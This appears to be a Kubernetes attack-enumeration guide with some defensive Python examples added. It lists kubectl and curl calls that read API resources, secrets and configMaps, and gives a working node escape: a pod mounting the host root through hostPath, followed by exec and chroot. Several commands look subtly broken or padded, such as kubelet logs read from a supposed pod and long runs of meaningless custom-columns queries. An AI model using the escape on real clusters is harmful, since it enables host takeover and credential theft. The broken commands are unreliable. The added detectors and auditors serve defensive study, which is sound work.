    kubectl port-forward -n kube-system kubelet-<id> 10248

Enumerating Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Enumerating Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Enumerating Etcd Logs

    kubectl logs -n kube-system etcd-<id>

Enumerating CoreDNS Logs

    kubectl logs -n kube-system coredns-<id>

Enumerating Kube-Controller-Manager Logs

    kubectl logs -n kube-system kube-controller-manager-<id>

Enumerating Kube-Scheduler Logs

    kubectl logs -n kube-system kube-scheduler-<id>

Enumerating Kube-API-Server Logs

    kubectl logs -n kube-system kube-apiserver-<id>

kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
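
Seen from the defender's side, every kubectl, k and kurl request listed above reaches the API server and is recorded when audit logging is enabled, so a burst of reads across many resource types from one identity stands out. The following Python example is added here and is not part of the original page; it assumes audit.k8s.io/v1 events in JSON-lines form, and the identities, the 60-second window and the five-resource threshold are constructed for illustration.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"   # format of requestReceivedTimestamp
READ_VERBS = {"get", "list", "watch"}
SENSITIVE = {"secrets", "roles", "rolebindings", "clusterroles", "clusterrolebindings"}


def make_event(ts, user, verb, resource, namespace, code):
    """Build one constructed audit.k8s.io/v1 Event as a JSON line."""
    return json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1",
        "stage": "ResponseComplete", "requestReceivedTimestamp": ts,
        "verb": verb, "user": {"username": user},
        "objectRef": {"resource": resource, "namespace": namespace},
        "responseStatus": {"code": code},
    })


# Constructed sample data: identities, namespaces and times are invented.
WEB = "system:serviceaccount:default:web"
CTRL = "system:serviceaccount:kube-system:deployment-controller"
ALICE = "alice@example.com"
SAMPLE_AUDIT_LOG = "\n".join([
    make_event("2024-01-01T10:00:00.000000Z", CTRL, "list", "pods", "default", 200),
    make_event("2024-01-01T10:00:01.000000Z", WEB, "list", "pods", "default", 200),
    make_event("2024-01-01T10:00:03.000000Z", WEB, "list", "services", "default", 200),
    make_event("2024-01-01T10:00:05.000000Z", WEB, "list", "secrets", "default", 403),
    make_event("2024-01-01T10:00:07.000000Z", WEB, "list", "nodes", "", 403),
    make_event("2024-01-01T10:00:09.000000Z", WEB, "list", "daemonsets", "default", 200),
    make_event("2024-01-01T10:00:11.000000Z", WEB, "list", "cronjobs", "default", 200),
    make_event("2024-01-01T10:00:13.000000Z", WEB, "list", "clusterroles", "", 403),
    make_event("2024-01-01T10:00:30.000000Z", CTRL, "watch", "pods", "default", 200),
    make_event("2024-01-01T10:00:31.000000Z", CTRL, "list", "replicasets", "default", 200),
    # A human operator touching five resource types, but spread over two hours.
    make_event("2024-01-01T09:00:00.000000Z", ALICE, "list", "pods", "prod", 200),
    make_event("2024-01-01T09:30:00.000000Z", ALICE, "get", "services", "prod", 200),
    make_event("2024-01-01T10:00:00.000000Z", ALICE, "get", "configmaps", "prod", 200),
    make_event("2024-01-01T10:30:00.000000Z", ALICE, "get", "secrets", "prod", 200),
    make_event("2024-01-01T11:00:00.000000Z", ALICE, "list", "nodes", "", 200),
    '{"kind": "Event", "stage": "ResponseComplete", "verb": "get"',  # truncated line
])


def parse_reads(log_text):
    """Return {username: [(timestamp, resource, status_code), ...]} for read requests."""
    per_user = defaultdict(list)
    for line in log_text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue                      # blank or truncated line
        if not isinstance(ev, dict):
            continue
        ref = ev.get("objectRef") or {}
        if (ev.get("stage") != "ResponseComplete" or ev.get("verb") not in READ_VERBS
                or not ref.get("resource")):
            continue                      # other stages, writes, non-resource URLs
        ts = datetime.strptime(ev["requestReceivedTimestamp"], TS_FORMAT)
        code = (ev.get("responseStatus") or {}).get("code", 0)
        user = (ev.get("user") or {}).get("username", "unknown")
        per_user[user].append((ts, ref["resource"], code))
    return per_user


def find_enumeration(log_text, window=timedelta(seconds=60), min_resources=5):
    """Flag identities that read >= min_resources distinct resource types within window."""
    findings = {}
    for user, events in parse_reads(log_text).items():
        events.sort()
        start, best = 0, None
        for end in range(len(events)):
            # Slide the window start forward until the burst fits in `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            resources = {res for _, res, _ in burst}
            if len(resources) >= min_resources and (
                    best is None or len(resources) > len(best["resources"])):
                best = {
                    "resources": sorted(resources),
                    "sensitive": sorted(resources & SENSITIVE),
                    "denied": sum(1 for _, _, code in burst if code == 403),
                    "first_seen": burst[0][0].isoformat(),
                }
        if best:
            findings[user] = best
    return findings


if __name__ == "__main__":
    for user, hit in find_enumeration(SAMPLE_AUDIT_LOG).items():
        print(user, json.dumps(hit))
```

The 403 count matters as much as the breadth: a workload service account that suddenly collects denials on secrets, nodes and cluster roles is probing permissions it was never granted.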

Get cronjob

Cron jobs allow you to schedule, using crontab-like syntax, the launch of a pod that will perform some action.

k get cronjobs

Kubernetes Enumeration

  1. Enumerating the API Server

    1.1. Get the API server address:

    kubectl cluster-info | grep 'Kubernetes master' | awk '/http/ {print $NF}'

    1.2. Get the API server version:

    curl -k https://<API_SERVER_ADDRESS>/version

    1.3. Get more information about the API server:

    curl -k https://<API_SERVER_ADDRESS>/swagger.json

  2. Enumerating Kubernetes Resources

    2.1. List the available API groups and resources:

    curl -k https://<API_SERVER_ADDRESS>/apis

    2.2. Get more information about a specific resource:

    curl -k https://<API_SERVER_ADDRESS>/apis/<GROUP>/<VERSION>/<RESOURCE>

  3. Enumerating Services

    3.1. List the available services:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/services

    3.2. Get more information about a specific service:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/services/<SERVICE_NAME>

  4. Enumerating Nodes

    4.1. List the available nodes:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/nodes

    4.2. Get more information about a specific node:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/nodes/<NODE_NAME>

  5. Enumerating Storage

    5.1. List the available storage classes:

    curl -k https://<API_SERVER_ADDRESS>/apis/storage.k8s.io/v1/storageclasses

    5.2. Get more information about a specific storage class:

    curl -k https://<API_SERVER_ADDRESS>/apis/storage.k8s.io/v1/storageclasses/<STORAGE_CLASS_NAME>

  6. Enumerating Events

    6.1. List the available events:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/events

    6.2. Get more information about a specific event:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/events/<EVENT_NAME>

  7. Enumerating Logs

    7.1. Get the logs of a pod:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/pods/<POD_NAME>/log

    7.2. Get the logs of a specific container in a pod:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/pods/<POD_NAME>/log?container=<CONTAINER_NAME>

  8. Enumerating RBAC

    8.1. List the available cluster roles:

    curl -k https://<API_SERVER_ADDRESS>/apis/rbac.authorization.k8s.io/v1/clusterroles

    8.2. Get more information about a specific cluster role:

    curl -k https://<API_SERVER_ADDRESS>/apis/rbac.authorization.k8s.io/v1/clusterroles/<ROLE_NAME>

  9. Enumerating Secrets

    9.1. List the available secrets:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/secrets

    9.2. Get more information about a specific secret:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/secrets/<SECRET_NAME>

  10. Enumerating ConfigMaps

    10.1. List the available configmaps:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/configmaps

    10.2. Get more information about a specific configmap:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/configmaps/<CONFIGMAP_NAME>

  11. Enumerating Namespaces

    11.1. List the available namespaces:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces

    11.2. Get more information about a specific namespace:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>

  12. Enumerating CRDs

    12.1. List the available CRDs:

    curl -k https://<API_SERVER_ADDRESS>/apis/apiextensions.k8s.io/v1/customresourcedefinitions

    12.2. Get more information about a specific CRD:

    curl -k https://<API_SERVER_ADDRESS>/apis/apiextensions.k8s.io/v1/customresourcedefinitions/<CRD_NAME>

  13. Enumerating Network Policies

    13.1. List the available network policies:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/networkpolicies

    13.2. Get more information about a specific network policy:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/namespaces/<NAMESPACE>/networkpolicies/<NETWORK_POLICY_NAME>

  14. Enumerating Pod Security Policies

    14.1. List the available pod security policies:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies

    14.2. Get more information about a specific pod security policy:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies/<POD_SECURITY_POLICY_NAME>

  15. Enumerating Service Accounts

    15.1. List the available service accounts:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/serviceaccounts

    15.2. Get more information about a specific service account:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/serviceaccounts/<SERVICE_ACCOUNT_NAME>

  16. Enumerating Custom Metrics

    16.1. List the available custom metrics:

    curl -k https://<API_SERVER_ADDRESS>/apis/custom.metrics.k8s.io/v1beta1

    16.2. Get more information about a specific custom metric:

    curl -k https://<API_SERVER_ADDRESS>/apis/custom.metrics.k8s.io/v1beta1/namespaces/<NAMESPACE>/pods/<POD_NAME>/<METRIC_NAME>

  17. Enumerating External Metrics

    17.1. List the available external metrics:

    curl -k https://<API_SERVER_ADDRESS>/apis/external.metrics.k8s.io/v1beta1

    17.2. Get more information about a specific external metric:

    curl -k https://<API_SERVER_ADDRESS>/apis/external.metrics.k8s.io/v1beta1/namespaces/<NAMESPACE>/<METRIC_NAME>

  18. Enumerating the Metrics Server

    18.1. List the available metrics:

    curl -k https://<API_SERVER_ADDRESS>/apis/metrics.k8s.io/v1beta1

    18.2. Get the metrics of a specific pod:

    curl -k https://<API_SERVER_ADDRESS>/apis/metrics.k8s.io/v1beta1/namespaces/<NAMESPACE>/pods/<POD_NAME>

  19. Enumerating Ingresses

    19.1. List the available ingresses:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/ingresses

    19.2. Get more information about a specific ingress:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/namespaces/<NAMESPACE>/ingresses/<INGRESS_NAME>

  20. Enumerating PodDisruptionBudgets

    20.1. List the available pod disruption budgets:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/poddisruptionbudgets

    20.2. Get more information about a specific pod disruption budget:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/namespaces/<NAMESPACE>/poddisruptionbudgets/<POD_DISRUPTION_BUDGET_NAME>

  21. Enumerating PriorityClasses

    21.1. List the available priority classes:

    curl -k https://<API_SERVER_ADDRESS>/apis/scheduling.k8s.io/v1/priorityclasses

    21.2. Get more information about a specific priority class:

    curl -k https://<API_SERVER_ADDRESS>/apis/scheduling.k8s.io/v1/priorityclasses/<PRIORITY_CLASS_NAME>

  22. Enumerating Leases

    22.1. List the available leases:

    curl -k https://<API_SERVER_ADDRESS>/apis/coordination.k8s.io/v1/leases

    22.2. Get more information about a specific lease:

    curl -k https://<API_SERVER_ADDRESS>/apis/coordination.k8s.io/v1/namespaces/<NAMESPACE>/leases/<LEASE_NAME>

  23. Enumerating LimitRanges

    23.1. List the available limit ranges:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/limitranges

    23.2. Get more information about a specific limit range:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/limitranges/<LIMIT_RANGE_NAME>

  24. Enumerating ResourceQuotas

    24.1. List the available resource quotas:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/resourcequotas

    24.2. Get more information about a specific resource quota:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/resourcequotas/<RESOURCE_QUOTA_NAME>

  25. Enumerating Horizontal Pod Autoscalers

    25.1. List the available autoscalers:

    curl -k https://<API_SERVER_ADDRESS>/apis/autoscaling/v1/horizontalpodautoscalers

    25.2. Get more information about a specific autoscaler:

    curl -k https://<API_SERVER_ADDRESS>/apis/autoscaling/v1/namespaces/<NAMESPACE>/horizontalpodautoscalers/<AUTOSCALER_NAME>

  26. Enumerating PodPresets

    26.1. List the available podpresets:

    curl -k https://<API_SERVER_ADDRESS>/apis/settings.k8s.io/v1alpha1/podpresets

    26.2. Get more information about a specific podpreset:

    curl -k https://<API_SERVER_ADDRESS>/apis/settings.k8s.io/v1alpha1/namespaces/<NAMESPACE>/podpresets/<PODPRESET_NAME>

kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs

Get configMap

A configMap usually holds a lot of information and configuration files that are provided to the applications running in Kubernetes. You can often find many passwords, secrets, and tokens used to connect and authenticate to other internal/external services.

k get configmaps # -n namespace

Kubernetes Enumeration

  1. Using kubectl

    • kubectl get pods
    • kubectl get deployments
    • kubectl get services
    • kubectl get configmaps
    • kubectl get secrets
    • kubectl get pv
    • kubectl get pvc
    • kubectl get nodes
    • kubectl get namespaces
    • kubectl get roles
    • kubectl get rolebindings
    • kubectl get clusterroles
    • kubectl get clusterrolebindings
    • kubectl get events
    • kubectl get limitranges
    • kubectl get resourcequotas
    • kubectl get podsecuritypolicies
    • kubectl get networkpolicies
    • kubectl get serviceaccounts
    • kubectl get ingresses
    • kubectl get storageclasses
    • kubectl get customresourcedefinitions
    • kubectl get daemonsets
    • kubectl get replicasets
    • kubectl get statefulsets
    • kubectl get jobs
    • kubectl get cronjobs
    • kubectl get endpoints
    • kubectl get componentstatuses
    • kubectl get certificatesigningrequests
    • kubectl get mutatingwebhookconfigurations
    • kubectl get validatingwebhookconfigurations
    • kubectl get poddisruptionbudgets
    • kubectl get priorityclasses
    • kubectl get csidrivers
    • kubectl get csinodes
    • kubectl get storageversions
    • kubectl get leases
    • kubectl get apiservices
    • kubectl get controllerrevisions
    • kubectl get tokenreviews
    • kubectl get localsubjectaccessreviews
    • kubectl get selfsubjectaccessreviews
    • kubectl get selfsubjectrulesreviews
    • kubectl get subjectaccessreviews
    • kubectl get horizontalpodautoscalers
    • kubectl get persistentvolumeclaims
    • kubectl get persistentvolumes
    • kubectl get service
    • kubectl get pod
    • kubectl get deployment
    • kubectl get namespace
    • kubectl get node
    • kubectl get rs
    • kubectl get rc
    • kubectl get ep
    • kubectl get svc
    • kubectl get cm
    • kubectl get sa
    • kubectl get role
    • kubectl get rolebinding
    • kubectl get crd
    • kubectl get csr
    • kubectl get sc
    • kubectl get cs
    • kubectl get ns
    • kubectl get no
    • kubectl get po
    • kubectl get all --all-namespaces
    • kubectl get all -A
    • kubectl get all
    • kubectl get all -o wide
    • kubectl get all -o yaml
    • kubectl get all -o json
    • kubectl get all -o custom-columns=:.metadata.name
    • kubectl get all -o custom-columns=:.metadata.namespace
    • kubectl get all -o custom-columns=:.metadata.creationTimestamp
    • kubectl get all -o custom-columns=:.metadata.labels
    • kubectl get all -o custom-columns=:.metadata.annotations
    • kubectl get all -o custom-columns=:.spec.nodeName
    • kubectl get all -o custom-columns=:.spec.host
    • kubectl get all -o custom-columns=:.spec.hostIP
    • kubectl get all -o custom-columns=:.spec.subdomain
    • kubectl get all -o custom-columns=:.spec.serviceAccountName
    • kubectl get all -o custom-columns=:.spec.terminationGracePeriodSeconds
    • kubectl get all -o custom-columns=:.spec.restartPolicy
    • kubectl get all -o custom-columns=:.spec.activeDeadlineSeconds
    • kubectl get all -o custom-columns=:.spec.dnsPolicy
    • kubectl get all -o custom-columns=:.spec.schedulerName
    • kubectl get all -o custom-columns=:.spec.securityContext
    • kubectl get all -o custom-columns=:.spec.affinity
    • kubectl get all -o custom-columns=:.spec.tolerations
    • kubectl get all -o custom-columns=:.spec.volumes
    • kubectl get all -o custom-columns=:.spec.containers
    • kubectl get all -o custom-columns=:.spec.initContainers
    • kubectl get all -o custom-columns=:.spec.imagePullSecrets
    • kubectl get all -o custom-columns=:.spec.hostname
    • kubectl get all -o custom-columns=:.spec.automountServiceAccountToken
    • kubectl get all -o custom-columns=:.status.phase
    • kubectl get all -o custom-columns=:.status.hostIP
    • kubectl get all -o custom-columns=:.status.podIP
    • kubectl get all -o custom-columns=:.status.startTime
    • kubectl get all -o custom-columns=:.status.containerStatuses
    • kubectl get all -o custom-columns=:.status.qosClass
    • kubectl get all -o custom-columns=:.status.conditions
    • kubectl get all -o custom-columns=:.status.message
    • kubectl get all -o custom-columns=:.status.reason
    • kubectl get all -o custom-columns=:.status.lastProbeTime
    • kubectl get all -o custom-columns=:.status.lastTransitionTime
    • kubectl get all -o custom-columns=:.status.ready
    • kubectl get all -o custom-columns=:.status.restartCount
    • kubectl get all -o custom-columns=:.status.image
    • kubectl get all -o custom-columns=:.status.imageID
    • kubectl get all -o custom-columns=:.status.containerID
    • kubectl get all -o custom-columns=:.status.started
    • kubectl get all -o custom-columns=:.status.finishedAt

kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
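
Since configMaps so often carry passwords and tokens that belong in Secrets, the same listing can be used for an audit. The following is an added example, not part of the original page: it scans parsed `kubectl get configmaps -A -o json` output for credential-like entries and reports where they are without echoing the values. The key-name hints, the value patterns and the sample data are assumptions constructed for illustration.

```python
import re

# Assumed hints: key names that usually denote credentials.
KEY_HINT = re.compile(
    r"passw(?:or)?d|passwd|secret|token|api[_-]?key|private[_-]?key|credential",
    re.I)

# Assumed value patterns that indicate a credential regardless of the key name.
VALUE_PATTERNS = {
    "private key block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "URL with embedded credentials": re.compile(
        r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.I),
    "JWT-like token": re.compile(
        r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}"),
}

# "name = value" or "name: value" lines inside an embedded config file.
ASSIGN = re.compile(r"^\s*([A-Za-z0-9_.-]+)\s*[:=]\s*(\S.*)$")


def scan_value(text):
    """Return the reasons a configMap value looks like it holds a credential."""
    reasons = [label for label, pat in VALUE_PATTERNS.items() if pat.search(text)]
    # configMaps often embed whole files (properties, ini, yaml): check each line.
    for line in text.splitlines():
        m = ASSIGN.match(line)
        if m and KEY_HINT.search(m.group(1)):
            reasons.append("embedded setting '%s'" % m.group(1))
    return reasons


def audit_configmaps(doc):
    """doc is a parsed ConfigMap or List object; values are never returned."""
    findings = []
    for cm in doc.get("items", [doc]):
        meta = cm.get("metadata", {})
        for key, value in (cm.get("data") or {}).items():
            reasons = []
            if KEY_HINT.search(key) and value.strip():
                reasons.append("key name looks like a credential")
            reasons += scan_value(value)
            if reasons:
                findings.append((meta.get("namespace", "default"),
                                 meta.get("name", ""), key, reasons))
    return findings


# Constructed sample in the shape of `kubectl get configmaps -A -o json`.
SAMPLE_CONFIGMAPS = {"kind": "List", "items": [
    {"kind": "ConfigMap",
     "metadata": {"name": "app-config", "namespace": "shop"},
     "data": {"LOG_LEVEL": "info",
              "DB_PASSWORD": "example-not-real",
              "application.properties":
                  "server.port=8080\nspring.datasource.password=example-not-real\n"}},
    {"kind": "ConfigMap",
     "metadata": {"name": "billing", "namespace": "shop"},
     "data": {"DATABASE_URL":
              "postgres://billing:example-not-real@db.internal:5432/billing"}},
    {"kind": "ConfigMap",
     "metadata": {"name": "ui", "namespace": "shop"},
     "data": {"THEME": "dark"}},
]}

if __name__ == "__main__":
    for ns, name, key, reasons in audit_configmaps(SAMPLE_CONFIGMAPS):
        print("%s/%s [%s]: %s" % (ns, name, key, "; ".join(reasons)))
```
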

Get "all"

k get all

Get Pods consumption

k top pod --all-namespaces

Escaping from the pod

If you are able to create new pods, you might be able to escape from them to the node. To do so, you need to create a new pod using a yaml file, switch into the created pod, and then chroot into the node's filesystem. You can use existing pods as a reference for the yaml file, since they show existing images and paths.

kubectl get pod <name> [-n <namespace>] -o yaml

If you need to create the pod on a specific node, you can use the following command to get the labels on the nodes:

k get nodes --show-labels

Usually, kubernetes.io/hostname and node-role.kubernetes.io/master are good labels for selection.

Then you create your attacker.yaml file:

apiVersion: v1
kind: Pod
metadata:
  labels:
    run: attacker-pod
  name: attacker-pod
  namespace: default
spec:
  volumes:
  - name: host-fs
    hostPath:
      path: /
  containers:
  - image: ubuntu
    imagePullPolicy: Always
    name: attacker-pod
    command: ["/bin/sh", "-c", "sleep infinity"]
    volumeMounts:
    - name: host-fs
      mountPath: /root
  restartPolicy: Never
  # nodeName and nodeSelector: enable one of them when you need to create the pod on a specific node
  #nodeName: master
  #nodeSelector:
  #  kubernetes.io/hostname: master
  # or using
  #  node-role.kubernetes.io/master: ""

modified yaml source

After that you create the pod:

kubectl apply -f attacker.yaml [-n <namespace>]

Now you can switch into the created pod as follows:

kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file

And finally you chroot into the node's filesystem:

chroot /root /bin/bash

Information obtained from: Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1; Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1
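
The escape above depends entirely on a pod being allowed to mount the node's filesystem through a hostPath volume. The following is an added example, not part of the original page: it audits parsed `kubectl get pods -A -o json` output for hostPath mounts, rates them, and notes pods pinned to control-plane nodes. The list of sensitive paths, the severity names and the sample pods are assumptions constructed for illustration.

```python
# Assumed list of host locations exposing node credentials or the container runtime.
SENSITIVE = ("/etc", "/root", "/proc", "/var/lib/kubelet", "/var/lib/etcd",
             "/var/run/docker.sock", "/run/containerd/containerd.sock")
CONTROL_PLANE_LABELS = ("node-role.kubernetes.io/master",
                        "node-role.kubernetes.io/control-plane")
ORDER = {"critical": 0, "high": 1, "review": 2}


def normalize(path):
    """Collapse duplicate slashes and '.' segments so '/etc/' equals '/etc'."""
    return "/" + "/".join(s for s in path.split("/") if s not in ("", "."))


def severity(host_path):
    """critical: whole node filesystem; high: overlaps a sensitive path."""
    p = normalize(host_path)
    if p == "/" or ".." in p.split("/"):
        return "critical"
    for s in SENSITIVE:
        # Equal to, a parent of, or located inside a sensitive path.
        if p == s or s.startswith(p + "/") or p.startswith(s + "/"):
            return "high"
    return "review"


def audit_pod(pod):
    """Return one finding per container mount that is backed by a hostPath volume."""
    meta, spec = pod.get("metadata", {}), pod.get("spec", {})
    host_vols = {v["name"]: v["hostPath"].get("path", "")
                 for v in spec.get("volumes") or [] if v.get("hostPath")}
    selector = spec.get("nodeSelector") or {}
    targets_cp = any(label in selector for label in CONTROL_PLANE_LABELS)
    containers = []
    for key in ("initContainers", "containers", "ephemeralContainers"):
        containers += spec.get(key) or []
    findings = []
    for c in containers:
        for m in c.get("volumeMounts") or []:
            if m.get("name") not in host_vols:
                continue
            path = host_vols[m["name"]]
            findings.append({
                "namespace": meta.get("namespace", "default"),
                "pod": meta.get("name", ""),
                "container": c.get("name", ""),
                "hostPath": normalize(path),
                "mountPath": m.get("mountPath", ""),
                "writable": not m.get("readOnly", False),
                "severity": severity(path),
                "targets_control_plane": targets_cp,
            })
    return findings


def audit(doc):
    """doc is a parsed Pod or List object; most severe findings come first."""
    pods = doc["items"] if "items" in doc else [doc]
    findings = [f for pod in pods for f in audit_pod(pod)]
    return sorted(findings, key=lambda f: ORDER[f["severity"]])


# Constructed sample: a read-only log mount, a pod without hostPath, and the
# pod from attacker.yaml with the control-plane nodeSelector enabled.
SAMPLE_PODS = {"kind": "List", "items": [
    {"metadata": {"name": "log-agent", "namespace": "logging"},
     "spec": {"volumes": [{"name": "logs", "hostPath": {"path": "/var/log"}}],
              "containers": [{"name": "agent", "volumeMounts": [
                  {"name": "logs", "mountPath": "/host/log", "readOnly": True}]}]}},
    {"metadata": {"name": "web", "namespace": "shop"},
     "spec": {"volumes": [{"name": "tmp", "emptyDir": {}}],
              "containers": [{"name": "web", "volumeMounts": [
                  {"name": "tmp", "mountPath": "/tmp"}]}]}},
    {"metadata": {"name": "attacker-pod", "namespace": "default"},
     "spec": {"nodeSelector": {"node-role.kubernetes.io/master": ""},
              "volumes": [{"name": "host-fs", "hostPath": {"path": "/"}}],
              "containers": [{"name": "attacker-pod", "volumeMounts": [
                  {"name": "host-fs", "mountPath": "/root"}]}]}},
]}

if __name__ == "__main__":
    for finding in audit(SAMPLE_PODS):
        print(finding)
```

A writable mount rated critical or high is the condition to block at admission time, for example by enforcing the baseline or restricted Pod Security Standards, which do not allow hostPath volumes.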
